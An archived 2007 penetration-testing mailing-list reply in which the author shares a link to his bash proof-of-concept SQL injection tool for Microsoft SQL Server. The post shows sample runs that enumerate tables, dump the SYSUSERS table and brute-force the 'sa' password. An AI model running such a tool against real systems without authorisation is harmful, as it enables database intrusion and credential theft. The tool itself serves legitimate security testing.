Penetration Testing mailing list archives
Re: Open Source SQL Inject, XSS, Remote File Include Testing
From: Marco Ivaldi <raptor () mediaservice net>
Date: Mon, 21 May 2007 13:45:41 +0200 (ora solare Europa occidentale)
On Sat, 19 May 2007, winsoc wrote:
Can anyone recommend a quick and cheerful Open Source Tool which will test websites for SQL Injection, XSS, Remote File Include.
Speaking of SQL injection, just wanted to point out a bash script i put together while pen-testing some web applications that use MS SQL Server as back-end:
http://www.0xdeadbeef.info/code/mssql-hax0r # Proof-of-concept multi-purpose SQL injection script for Microsoft SQL # Server exploitation. Three operational mode are currently available: # info (Information Gathetering), dump (Record Dump), and brute (Brute # Force). You may need to tweak the code a bit to make it fit your needs # (i.e., modifying the injection string and/or the language used by the # RDBMS).You shouldn't expect anything too fancy (it's still v0.1 after all;), but it does its job:
root@shaolin:~# ./mssql-hax0r info tables+++ DBFoobar Accounting (id:390494850) CanoneAnnuo (money) CodiceFornitore (varchar) dataInsert (datetime) GroupId (char) * GroupInsert (varchar) idAccount (varchar) idAnagrafica (int) [...] root@shaolin:~# ./mssql-hax0r dump -------------------------------- SYSUSERS.uid=0 SYSUSERS.name=public SYSUSERS.password= -------------------------------- SYSUSERS.uid=1 SYSUSERS.name=dbo SYSUSERS.password= -------------------------------- SYSUSERS.uid=2 SYSUSERS.name=guest SYSUSERS.password= -------------------------------- 3 record(s) dumped. root@shaolin:~# ./mssql-hax0r brute xxx Default (empty) password not valid, starting bruteforce. aaa bbb ccc password Password of 'sa' user is 'password'!;) Enjoy, -- Marco Ivaldi, OPST Chief Security Officer Data Security Division @ Mediaservice.net Srl http://mediaservice.net/ ------------------------------------------------------------------------ This List Sponsored by: Cenzic Are you using SPI, Watchfire or WhiteHat? Consider getting clear vision with Cenzic See HOW Now with our 20/20 program! http://www.cenzic.com/c/2020 ------------------------------------------------------------------------
Current thread:
- Open Source SQL Inject, XSS, Remote File Include Testing winsoc (May 19)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing jgervacio (May 20)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing Nikhil Wagholikar (May 21)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing Rodrigo Montoro (Sp0oKeR) (May 21)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing Marco Ivaldi (May 21)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing Marco Ivaldi (May 24)
- Re: Open Source SQL Inject, XSS, Remote File Include Testing jgervacio (May 20)